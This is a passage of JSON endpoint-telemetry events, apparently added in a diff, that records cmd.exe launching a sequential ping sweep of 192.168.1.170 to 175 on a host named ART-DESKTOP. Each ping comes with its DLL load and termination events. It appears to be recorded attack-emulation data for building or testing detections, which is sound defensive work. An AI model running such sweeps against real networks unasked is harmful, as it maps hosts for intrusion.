"parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6752, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572812150000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572812140000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572812140000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" 
+ }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572812140000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572812140000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572812140000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572812140000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572812140000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572812140000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": 
"C:\\Windows\\System32\\winnsi.dll", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572812140000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572812140000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572812140000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" + }, + { + "event_type": "process", + "pid": 6752, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572816830000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001094315301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.170", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2792, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + 
"event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + 
"pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572816980000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + "event_type": "process", + "pid": 2792, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572821830000, + "unique_pid": "{42FC7E13-CBA1-5C05-0000-001011345301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.171", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5116, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + 
"image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5116, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5116, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5116, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5116, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5116, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5116, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5116, + "process_name": 
"PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5116, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5116, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5116, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5116, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572821980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "event_type": "process", + "pid": 5116, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572826830000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001087365301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.172", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3896, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", 
+ "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572826980000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "event_type": "process", + "pid": 3896, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572831990000, + "unique_pid": "{42FC7E13-CBA2-5C05-0000-001003395301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.173", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7468, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
"timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572832140000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "event_type": "process", + 
"pid": 7468, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572836830000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010723B5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.174", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2960, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572836970000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572836980000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572836980000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572836980000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572836980000, + 
"unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572836980000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572836980000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572836980000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572836980000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572836980000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572836980000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + 
"image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572836980000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "event_type": "process", + "pid": 2960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572841990000, + "unique_pid": "{42FC7E13-CBA3-5C05-0000-0010F33D5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.175", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5244, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572842140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572842140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572842140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572842140000, + "unique_pid": 
"{42FC7E13-CBA4-5C05-0000-001063405301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572842140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572842140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572842140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572842140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572842140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5244, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572842140000, + "unique_pid": "{42FC7E13-CBA4-5C05-0000-001063405301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + 
